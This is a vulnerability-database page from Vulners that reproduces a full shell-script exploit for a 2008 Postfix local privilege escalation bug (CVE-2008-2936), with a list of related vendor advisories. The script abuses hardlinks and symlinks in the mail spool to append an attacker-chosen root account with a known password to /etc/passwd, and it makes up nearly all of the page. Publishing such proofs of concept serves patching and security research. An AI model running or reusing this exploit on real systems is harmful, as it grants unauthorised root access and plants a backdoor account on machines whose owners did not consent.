Vulners
Lucene search
Postfix <= 2.6-20080814 (symlink) Local Privilege Escalation Exploit
| Reporter | Title | Published | Views | Family All 78 |
|---|---|---|---|---|
 | CentOS 3 / 4 / 5 : postfix (CESA-2008:0839) | 15 Aug 200800:00 | – | nessus |
| Debian DSA-1629-2 : postfix - programming error | 19 Aug 200800:00 | – | nessus |
| Fedora 9 : postfix-2.5.5-1.fc9 (2008-8593) | 10 Oct 200800:00 | – | nessus |
| Fedora 8 : postfix-2.5.5-1.fc8 (2008-8595) | 10 Oct 200800:00 | – | nessus |
| GLSA-200808-12 : Postfix: Local privilege escalation vulnerability | 15 Aug 200800:00 | – | nessus |
| Mandriva Linux Security Advisory : postfix (MDVSA-2008:171) | 23 Apr 200900:00 | – | nessus |
| MiracleLinux 3 : postfix-2.3.3-2.9AXS3 (AXSA:2008-88:01) | 14 Jan 202600:00 | – | nessus |
| NewStart CGSL MAIN 6.06 : postfix Multiple Vulnerabilities (NS-SA-2025-0220) | 30 Sep 202500:00 | – | nessus |
| NewStart CGSL MAIN 6.06 (SP) : postfix Multiple Vulnerabilities (NS-SA-2026-0024) | 6 Mar 202600:00 | – | nessus |
| Oracle Linux 5 : post (ELSA-2008-0839) | 12 Jul 201300:00 | – | nessus |
10
====================================================================
Postfix <= 2.6-20080814 (symlink) Local Privilege Escalation Exploit
====================================================================
#!/bin/sh
#
# "rs_pocfix.sh" (PoC for Postfix local root vulnerability: CVE-2008-2936)
# by Roman Medina-Heigl Hernandez a.k.a. RoMaNSoFt <[email protected]>
#
# Tested: Ubuntu / Debian
#
# [ Madrid, 30.Aug.2008 ]
#
# Config
writable_dir=/tmp
spool_dir=/var/mail # Use "postconf mail_spool_directory" to obtain this
user=root
target=/etc/passwd
useful_link=/usr/bin/atq # lrwxrwxrwx 2 root root 2 2007-05-04 22:15 /usr/bin/atq -> at
useful_link_dst=at # Tip: find / -type l -uid 0 -print -exec ls -l {} \; | less
seconds=3
user_in_passwd="dsr:3GsXLdEaKaGnM:0:0:root:/root:/bin/sh" # Pass is "dsrrocks"
postfix=`which postfix` # /usr/sbin/postfix
postconf=/usr/sbin/postconf
postmap=/usr/sbin/postmap
# Funcs
quit()
{
echo "$1"
exit
}
# Step 1: is my system vulnerable?
head -n 9 $0 | tail -n 8
if [ $postfix ] ; then
echo "[*] Postfix seems to be installed"
else
quit "[!] Are you sure Postfix is installed?"
fi
mkdir -p $writable_dir/pocfix
touch $writable_dir/pocfix/src
ln -s $writable_dir/pocfix/src $writable_dir/pocfix/dst1
ln $writable_dir/pocfix/dst1 $writable_dir/pocfix/dst2
if [ -L $writable_dir/pocfix/dst2 ] ; then
echo "[*] Hardlink to symlink not dereferenced"
rm -rf $writable_dir/pocfix
else
rm -rf $writable_dir/pocfix
quit "[!] Hardlink to symlink correctly dereferenced. System is not vulnerable"
fi
if [ -d $spool_dir -a -w $spool_dir ] ; then
echo "[*] Spool dir is writable"
else
quit "[!] Spool dir is not writable"
fi
if [ -e $spool_dir/$user ] ; then
rm -f $spool_dir/$user
echo "[*] Mailbox for \"$user\" found. Trying to delete it"
if [ -e $spool_dir/$user ] ; then
quit "[!] Couldn't delete it"
else
echo "[*] Deletion ok"
fi
fi
if [ -e $spool_dir/$useful_link_dst ] ; then
rm -f $spool_dir/$useful_link_dst
echo "[*] Mailbox for \"$useful_link_dst\" found. Trying to delete it"
if [ -e $spool_dir/$useful_link_dst ] ; then
quit "[!] Couldn't delete it"
else
echo "[*] Deletion ok"
fi
fi
aliases=`$postconf alias_database | cut -d"=" -f2`
$postconf alias_maps | grep -q $aliases
if [ $? -eq 0 ] ; then
if [ $aliases ] ; then
$postmap -q $user $aliases > /dev/null
if [ $? -eq 0 ] ; then
quit "[!] Mail alias for \"$user\" exists"
fi
fi
fi
lda=`$postconf mailbox_command | cut -d"=" -f2`
if [ $lda ] ; then
quit "[!] Non-Postfix LDA detected"
fi
$postconf home_mailbox | grep -q '/$'
if [ $? -eq 0 ] ; then
quit "[!] Maildir-style mailbox detected"
fi
# Step 2: Exploiting
ln -f $useful_link $spool_dir/$user 2> /dev/null || quit "[!] Couldn't create hardlink (different partitions?)"
ln -s -f $target $spool_dir/$useful_link_dst 2> /dev/null || quit "[!] Couldn't create symlink pointing to target file"
cp -f $target $writable_dir/pocfix_target_backup.$$ && echo "[*] Backed up: $target (saved as \"$writable_dir/pocfix_target_backup.$$\")"
echo "[*] Sending mail ($seconds seconds wait)"
echo $user_in_passwd | /usr/sbin/sendmail $user
sleep $seconds
diff -q $target $writable_dir/pocfix_target_backup.$$ > /dev/null
if [ $? -eq 0 ] ; then
echo "[!] Exploit failed"
else
echo "[*] Exploit successful (appended data to $target). Now \"su dsr\", pass is \"dsrrocks\")"
fi
rm -f $spool_dir/$user
rm -f $spool_dir/$useful_link_dst
# 0day.today [2018-04-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
31 Aug 2008 00:00Current
6.8Medium risk
Vulners AI Score6.8
EPSS0.00249